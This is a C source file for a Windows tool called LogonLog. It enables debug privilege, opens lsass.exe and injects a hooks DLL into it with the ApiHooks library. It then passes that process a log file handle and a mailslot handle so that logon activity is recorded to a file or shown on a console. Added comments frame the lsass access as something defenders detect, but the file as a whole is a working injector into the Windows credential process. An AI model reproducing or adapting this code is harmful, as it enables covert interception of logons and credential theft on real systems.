#define WIN32_LEAN_AND_MEAN
#define UNICODE
#ifdef UNICODE
#define _UNICODE
#endif
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <tchar.h>
//#define AH_STATIC_LINKING
#include <ApiHooks.h>
#define PW_STATIC_LINKING
#include <PrcWorks.h>
#include "LogonLog.h"
/////////////////////////////////////////////////////////
// Run flag shared between the main thread and the ReadMS thread: ReadMS
// loops while it is TRUE, _tmain clears it on every shutdown/error path.
// NOTE(review): it is a plain BOOL, not volatile/atomic — the compiler is
// not obliged to re-read it on each loop iteration.
BOOL Active = TRUE;
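/*
 * Thread body that drains the mailslot and echoes each message to the console.
 *
 * hMS - read end of the mailslot created in _tmain, passed as the thread
 *       parameter; this function owns it and closes it before returning.
 * Returns the CloseHandle(hMS) result as the thread exit code.
 *
 * Runs until the global Active flag is cleared by _tmain. Each message is
 * NUL-terminated explicitly (ReadFile does not do that) and printed through
 * a fixed "%s" format, so mailslot content is never interpreted as a format
 * string (CWE-134) and a full-size message cannot be read past the buffer.
 */
DWORD WINAPI ReadMS(HANDLE hMS) {
    DWORD i = 0;
    // One extra TCHAR of room for the terminator even when a message fills
    // MS_MAX_MSG_SIZE bytes exactly.
    TCHAR Msg[MS_MAX_MSG_SIZE/sizeof(TCHAR) + 1];
    while(Active) {
        if(ReadFile(hMS, Msg, MS_MAX_MSG_SIZE, &i, NULL)) {
            // i is a byte count <= MS_MAX_MSG_SIZE, so i/sizeof(TCHAR) is in bounds.
            Msg[i/sizeof(TCHAR)] = _T('\0');
            _tprintf(_T("%s"), Msg);
        }
    }
    return(CloseHandle(hMS));
}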
/////////////////////////////////////////////////////////
/*
 * Entry point. Parses "[/i|/u] [FileName]", optionally opens the log file and
 * an interactive mailslot console, then loads the hooks DLL into lsass.exe
 * (through the ApiHooks/PrcWorks helpers declared in the headers above) and
 * hands it the duplicated output handles.
 *
 * argc/argv - command line; argv[1] is either a "/x" switch or the log file
 *             name, argv[2] is the log file name when a switch was given.
 * Returns 0 on the normal path; most error paths print a message and return
 * the result of getch() so the console window stays open until a key press.
 *
 * From a defender's standpoint the sequence below — enabling a debug
 * privilege, opening lsass.exe, duplicating handles into it and loading a
 * DLL there — is exactly the cross-process activity that process-access and
 * image-load telemetry on lsass.exe exists to surface; its presence on a
 * host is a credential-access indicator.
 */
int _tmain(int argc, TCHAR** argv) {
// Wrong argument count: print usage and wait for a key so the window stays up.
if((argc < 2) || (argc > 3)) {
_tprintf(_T("Usage: LogonLog [/i|/u] [FileName]\n/i .. log to screen\n/u .. end logging and unload"));
return(getch());
}
else {
BOOL StayInteractive = FALSE, Unload = FALSE;
LPTSTR LogFileName = NULL;
if(argv[1][0] == '/') {
// OR-ing with ' ' folds an ASCII letter to lower case, so /I and /i both match.
StayInteractive = (argv[1][1] | ' ') == 'i';
Unload = (argv[1][1] | ' ') == 'u';
if(argc == 3)
LogFileName = argv[2];
}
else
LogFileName = argv[1];
// hLogFile: optional log file; hMS: mailslot read end consumed by ReadMS;
// hMSClient: mailslot write end that is later duplicated into lsass.
HANDLE hLogFile = INVALID_HANDLE_VALUE;
HANDLE hMS = INVALID_HANDLE_VALUE;
HANDLE hMSClient = INVALID_HANDLE_VALUE;
// Only the start paths need output handles; /u just signals the DLL to stop.
if(!Unload) {
if(LogFileName)
// OPEN_ALWAYS plus the seek to FILE_END below appends to an existing log.
if((hLogFile = CreateFile(LogFileName, GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_WRITE_THROUGH, NULL))
== INVALID_HANDLE_VALUE) {
_tprintf(_T("\nLogonLog: Can't create LogFile!"));
// In /i mode a failed file open is tolerated; hLogFile stays invalid.
if(!StayInteractive)
return(getch());
}
else
SetFilePointer(hLogFile, 0, NULL, FILE_END);
if(StayInteractive)
// Server side of the mailslot (read end), read timeout 2000 ms.
if((hMS = CreateMailslot(MSName, MS_MAX_MSG_SIZE, 2000, NULL)) == INVALID_HANDLE_VALUE) {
_tprintf(_T("\nLogonLog: Can't create mailslot!"));
if(hLogFile == INVALID_HANDLE_VALUE)
return(getch());
}
else
// Client side (write end) of the same mailslot; this is the handle the
// injected DLL receives. NOTE(review): the message below is the same as
// for the server-side failure, although the failing call here is the open.
if((hMSClient = CreateFile(MSName, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)) == INVALID_HANDLE_VALUE) {
CloseHandle(hMS);
_tprintf(_T("\nLogonLog: Can't create mailslot!"));
if(hLogFile == INVALID_HANDLE_VALUE)
return(getch());
}
}
// Debug privilege is required for the lsass access below. Params map to
// RtlAdjustPrivilege(Privilege = 20 (SeDebugPrivilege), Enable = TRUE,
// CurrentThread = FALSE, &WasEnabled); the call is made in this process
// through the PrcWorks LoadAndCall helper (declared in PrcWorks.h, not shown).
// Note the pointer is passed as a DWORD.
DWORD WasEn;
DWORD Params[4] = {20, TRUE, 0, (DWORD)&WasEn};
LoadAndCall(NULL, _T("ntdll.dll"), GetCurrentProcessId(), 0, 0, _T("RtlAdjustPrivilege"), 4, Params);
// Find the lsass process; the existing naming convention says the "0/"
// prefix selects session 0 (ProcessName2PID's syntax is not shown here).
DWORD LSAPID = ProcessName2PID(_T("0/lsass.exe"));
HANDLE hLSA;
// PROCESS_DUP_HANDLE is all that is needed locally: the handles are pushed
// into lsass with DuplicateHandle further down. A non-system process opening
// lsass.exe is a high-signal event for process-access auditing.
if((hLSA = OpenProcess(PROCESS_DUP_HANDLE, FALSE, LSAPID)) == NULL) {
CloseHandle(hMS);
CloseHandle(hMSClient);
CloseHandle(hLogFile);
_tprintf(_T("\nLogonLog: Can't find/open lsass process!"));
return(getch());
}
else {
// Derive the hooks DLL name from this executable's own path: same name,
// extension rewritten to "DLL". GetModuleFileName returns the character
// count without the terminator, so nc-1..nc-3 are the extension letters.
// NOTE(review): a failed call (nc == 0) is not checked before indexing.
TCHAR Hooks_DLL[MAX_PATH];
DWORD nc = GetModuleFileName(NULL, Hooks_DLL, sizeof(Hooks_DLL)/sizeof(TCHAR));
Hooks_DLL[nc-1] = 'L';
Hooks_DLL[nc-2] = 'L';
Hooks_DLL[nc-3] = 'D';
// Walk back from the terminator to the last backslash; ShortHooks_DLL is
// the bare file name used for the module lookups below.
for(; nc && (Hooks_DLL[nc] != '\\'); nc--);
LPTSTR ShortHooks_DLL = &Hooks_DLL[nc+1];
// Single argument for the DLL's StopLog export (LACThreadBodyAlias comes
// from one of the project headers above, not shown here).
DWORD UnloadPars[1] = {LACThreadBodyAlias};
// /u: tell the DLL already inside lsass to stop, then exit with its result.
if(Unload) {
CloseHandle(hLSA);
return(LoadAndCall(NULL, ShortHooks_DLL, LSAPID, 1, 0, _T("StopLog"), 1, UnloadPars));
}
if(StayInteractive) {
// The union overlays WORD[2] on COORD so wsize[1] addresses COORD.Y;
// the requested buffer starts at 80 x 0x910 and Y is shrunk by 0x10 until
// the console accepts the size.
typedef union {
COORD coord;
WORD wsize[2];
} LCC32_COORD;
LCC32_COORD cbsize = {{80, 0x910}};
// Replace the inherited console with a fresh one for the message view.
FreeConsole();
AllocConsole();
HANDLE StdOut = GetStdHandle(STD_OUTPUT_HANDLE);
while(!SetConsoleScreenBufferSize(StdOut, cbsize.coord))
cbsize.wsize[1] -= 0x10;
SetConsoleTitle(_T("LogonLog Messages (Press any key to stop logging)"));
// i receives the thread id. The thread handle is closed immediately; a
// NULL CreateThread result makes CloseHandle fail, which is the error path.
DWORD i;
if(!CloseHandle(CreateThread(NULL, 0, ReadMS, hMS, 0, &i))) {
CloseHandle(hMS);
CloseHandle(hMSClient);
_tprintf(_T("\nLogonLog: Can't create ReadMS thread!"));
if(hLogFile == INVALID_HANDLE_VALUE)
return(getch());
}
}
// Refuse to start twice. A non-zero result with a zero low word is taken
// as "module already present"; the encoding is defined by ApiHooks.h.
DWORD AHResult = IsModuleLoaded(NULL, ShortHooks_DLL, LSAPID, 60000);
if((AHResult) && ((AHResult & 0xffff) == 0)) {
Active = FALSE;
CloseHandle(hLogFile);
CloseHandle(hMS);
CloseHandle(hMSClient);
CloseHandle(hLSA);
_tprintf(_T("Already logging!"));
return(getch());
}
// Load the hooks DLL into lsass (60 s timeout). This is the image-load
// event defenders watch for on lsass.exe.
AHResult = EstablishApiHooks(NULL, Hooks_DLL, LSAPID, 60000);
if(AHResult != ErrorAWSuccess) {
Active = FALSE;
CloseHandle(hLogFile);
CloseHandle(hMS);
CloseHandle(hMSClient);
CloseHandle(hLSA);
_tprintf(_T("ApiHooks failed!"));
return(getch());
}
else {
// Hand the output handles to lsass. DUPLICATE_CLOSE_SOURCE closes the
// local copies, so hLogFile/hMSClient must not be closed again below.
HANDLE StartLogPars[2] = {INVALID_HANDLE_VALUE, INVALID_HANDLE_VALUE};
HANDLE hCurP = GetCurrentProcess();
if(hLogFile != INVALID_HANDLE_VALUE)
DuplicateHandle(hCurP, hLogFile, hLSA, &StartLogPars[0], 0, FALSE, DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS);
if(hMSClient != INVALID_HANDLE_VALUE)
DuplicateHandle(hCurP, hMSClient, hLSA, &StartLogPars[1], 0, FALSE, DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS);
CloseHandle(hLSA);
// Neither handle made it across (or none was requested): undo the load.
if((StartLogPars[0] == StartLogPars[1]) && (StartLogPars[1] == INVALID_HANDLE_VALUE)) {
Active = FALSE;
CloseHandle(hMS);
_tprintf(_T("DupHandle failed!"));
LoadAndCall(NULL, Hooks_DLL, LSAPID, 1, 0, _T("StopLog"), 1, UnloadPars);
return(getch());
}
LoadAndCall(NULL, Hooks_DLL, LSAPID, 60000, 0, _T("StartLog"), 2, StartLogPars);
// Interactive mode: block on a key press, then stop the reader and the DLL.
if(hMSClient != INVALID_HANDLE_VALUE) {
getch();
Active = FALSE;
CloseHandle(hMS);
LoadAndCall(NULL, Hooks_DLL, LSAPID, 1, 0, _T("StopLog"), 1, UnloadPars);
}
}
}
}
return(0);
}